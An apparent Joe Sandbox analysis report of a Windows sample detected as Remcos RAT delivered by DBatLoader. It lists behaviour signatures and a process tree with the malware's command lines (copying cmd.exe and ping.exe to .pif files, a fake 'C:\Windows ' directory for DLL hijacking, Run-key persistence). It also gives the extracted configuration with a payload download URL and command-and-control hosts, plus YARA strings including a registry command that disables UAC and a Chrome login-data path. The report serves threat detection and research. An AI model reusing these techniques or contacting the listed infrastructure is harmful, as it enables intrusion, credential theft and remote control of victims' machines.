Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jW3NEKvxH1.exe

Overview

General Information

Sample name:jW3NEKvxH1.exe
renamed because original name is a hash value
Original sample name:e4696be1368f7ac260c605c7b4f7eeaf.exe
Analysis ID:1569880
MD5:e4696be1368f7ac260c605c7b4f7eeaf
SHA1:d73a7226926b44f66d94ff7b229ef8243976eb6d
SHA256:592624f30b177058eba9b5b36e2e72bea42af95bf1552ca9a9ca28c4e1e6cfeb
Tags:exeuser-abuse_ch
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Queues an APC in another process (thread injection)
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • jW3NEKvxH1.exe (PID: 616 cmdline: "C:\Users\user\Desktop\jW3NEKvxH1.exe" MD5: E4696BE1368F7AC260C605C7B4F7EEAF)
    • cmd.exe (PID: 5948 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxpbyalD.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 5852 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 3840 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • alpha.pif (PID: 2996 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 2800 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 3968 cmdline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • xpha.pif (PID: 5988 cmdline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • alpha.pif (PID: 5280 cmdline: C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 6404 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 4136 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • esentutl.exe (PID: 2356 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jW3NEKvxH1.exe /d C:\\Users\\Public\\Libraries\\Dlaybpxl.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SndVol.exe (PID: 4576 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • Dlaybpxl.PIF (PID: 3604 cmdline: "C:\Users\Public\Libraries\Dlaybpxl.PIF" MD5: E4696BE1368F7AC260C605C7B4F7EEAF)
    • SndVol.exe (PID: 3648 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • Dlaybpxl.PIF (PID: 6112 cmdline: "C:\Users\Public\Libraries\Dlaybpxl.PIF" MD5: E4696BE1368F7AC260C605C7B4F7EEAF)
    • colorcpl.exe (PID: 2680 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://bitbucket.org/masterservicwes/mastermanservices/downloads/165_Dlaybpxloke"]}

Threatname: Remcos

{"Host:Port:Password": ["zara.master-workdone.com.ua:5874:1", "manazara.master-workdone.com.ua:5874:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-RX8VCL", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6b6f8:$a1: Remcos restarted by watchdog!
        • 0x6bc70:$a3: %02i:%02i:%02i:%03i
        00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
        • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
        • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x65a04:$str_b2: Executing file:
        • 0x6683c:$str_b3: GetDirectListeningPort
        • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x66380:$str_b7: \update.vbs
        • 0x65a2c:$str_b9: Downloaded file:
        • 0x65a18:$str_b10: Downloading file:
        • 0x65abc:$str_b12: Failed to upload file:
        • 0x66804:$str_b13: StartForward
        • 0x66824:$str_b14: StopForward
        • 0x662d8:$str_b15: fso.DeleteFile "
        • 0x6626c:$str_b16: On Error Resume Next
        • 0x66308:$str_b17: fso.DeleteFolder "
        • 0x65aac:$str_b18: Uploaded file:
        • 0x65a6c:$str_b19: Unable to delete:
        • 0x662a0:$str_b20: while fso.FileExists("
        • 0x65f49:$str_c0: [Firefox StoredLogins not found]
        Click to see the 40 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        19.2.SndVol.exe.2940000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          19.2.SndVol.exe.2940000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            19.2.SndVol.exe.2940000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              19.2.SndVol.exe.2940000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6aaf8:$a1: Remcos restarted by watchdog!
              • 0x6b070:$a3: %02i:%02i:%02i:%03i
              19.2.SndVol.exe.2940000.0.unpackREMCOS_RAT_variantsunknownunknown
              • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
              • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x64e04:$str_b2: Executing file:
              • 0x65c3c:$str_b3: GetDirectListeningPort
              • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x65780:$str_b7: \update.vbs
              • 0x64e2c:$str_b9: Downloaded file:
              • 0x64e18:$str_b10: Downloading file:
              • 0x64ebc:$str_b12: Failed to upload file:
              • 0x65c04:$str_b13: StartForward
              • 0x65c24:$str_b14: StopForward
              • 0x656d8:$str_b15: fso.DeleteFile "
              • 0x6566c:$str_b16: On Error Resume Next
              • 0x65708:$str_b17: fso.DeleteFolder "
              • 0x64eac:$str_b18: Uploaded file:
              • 0x64e6c:$str_b19: Unable to delete:
              • 0x656a0:$str_b20: while fso.FileExists("
              • 0x65349:$str_c0: [Firefox StoredLogins not found]
              Click to see the 37 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
              Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\jW3NEKvxH1.exe, ProcessId: 616, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
              Sigma detected: Execution from Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.pif, NewProcessName: C:\Users\Public\alpha.pif, OriginalFileName: C:\Users\Public\alpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxpbyalD.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5948, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , ProcessId: 2996, ProcessName: alpha.pif
              Sigma detected: New RUN Key Pointing to Suspicious Folder
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Dlaybpxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\jW3NEKvxH1.exe, ProcessId: 616, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dlaybpxl
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Dlaybpxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\jW3NEKvxH1.exe, ProcessId: 616, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dlaybpxl
              Sigma detected: Execution of Suspicious File Type Extension
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.pif, NewProcessName: C:\Users\Public\alpha.pif, OriginalFileName: C:\Users\Public\alpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxpbyalD.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5948, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , ProcessId: 2996, ProcessName: alpha.pif

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: Registry Key setAuthor: Joe Security: Data: Details: AC 70 73 C2 29 A5 77 CA 2A 18 05 44 B7 8F 28 C4 C7 62 0A F1 A2 6B 9B 61 5A 55 D5 51 05 C8 67 BE 32 59 27 CA 5B AA F2 FE 55 EE C9 04 48 39 E9 42 0E 44 B4 21 63 48 7B 72 C7 F1 D4 75 D2 D1 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\SndVol.exe, ProcessId: 4576, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-RX8VCL\exepath

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-06T11:04:36.837037+010020283713Unknown Traffic192.168.2.649716185.166.143.50443TCP
              2024-12-06T11:04:39.532643+010020283713Unknown Traffic192.168.2.6497183.5.30.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-06T11:04:28.472775+010020365941Malware Command and Control Activity Detected192.168.2.650033104.243.42.2545874TCP
              2024-12-06T11:05:08.868641+010020365941Malware Command and Control Activity Detected192.168.2.649730104.243.42.2545874TCP
              2024-12-06T11:05:31.035427+010020365941Malware Command and Control Activity Detected192.168.2.649785104.243.42.2545874TCP
              2024-12-06T11:05:54.067255+010020365941Malware Command and Control Activity Detected192.168.2.649856104.243.42.2545874TCP
              2024-12-06T11:06:16.114807+010020365941Malware Command and Control Activity Detected192.168.2.649914104.243.42.2545874TCP
              2024-12-06T11:06:39.162175+010020365941Malware Command and Control Activity Detected192.168.2.649967104.243.42.2545874TCP
              2024-12-06T11:07:01.193957+010020365941Malware Command and Control Activity Detected192.168.2.650018104.243.42.2545874TCP
              2024-12-06T11:07:24.260479+010020365941Malware Command and Control Activity Detected192.168.2.650028104.243.42.2545874TCP
              2024-12-06T11:07:46.319799+010020365941Malware Command and Control Activity Detected192.168.2.650030104.243.42.2545874TCP
              2024-12-06T11:08:09.367055+010020365941Malware Command and Control Activity Detected192.168.2.650031104.243.42.2545874TCP
              2024-12-06T11:08:31.397225+010020365941Malware Command and Control Activity Detected192.168.2.650032104.243.42.2545874TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: jW3NEKvxH1.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://bitbucket.org/masterservicwes/mastermanservices/downloads/165_Dlaybpxloke"]}
              Source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["zara.master-workdone.com.ua:5874:1", "manazara.master-workdone.com.ua:5874:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-RX8VCL", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFReversingLabs: Detection: 55%
              Multi AV Scanner detection for submitted file
              Source: jW3NEKvxH1.exeReversingLabs: Detection: 55%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.2435347353.0000000021D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2511848182.0000000033ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0295293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,6_2_0295293A
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0297293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,19_2_0297293A
              Source: jW3NEKvxH1.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

              Exploits

              barindex
              Yara detected UAC Bypass using CMSTP
              Source: Yara matchFile source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR

              Privilege Escalation

              barindex
              Contains functionality to bypass UAC (CMSTPLUA)
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02926764 _wcslen,CoGetObject,6_2_02926764
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02946764 _wcslen,CoGetObject,19_2_02946764
              Source: jW3NEKvxH1.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.6:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.5.30.3:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: jW3NEKvxH1.exe, jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A3E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F920000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266110150.0000000002366000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2245097882.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000009.00000000.2272956424.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 0000000A.00000000.2294839083.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 0000000B.00000002.2390955236.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000011.00000002.2395576863.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000012.00000000.2403173477.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000014.00000000.2410473637.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif.4.dr
              Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000008.00000003.2265634215.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000000C.00000002.2390214130.0000000000841000.00000020.00000001.01000000.00000008.sdmp, xpha.pif.8.dr
              Source: Binary string: easinvoker.pdbH source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbGCTL source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A3E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F920000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B2D000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B5E000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266672340.000000000282C000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145952303.000000000282E000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266110150.0000000002366000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000B.00000002.2390955236.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000011.00000002.2395576863.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000012.00000000.2403173477.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000014.00000000.2410473637.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif.4.dr
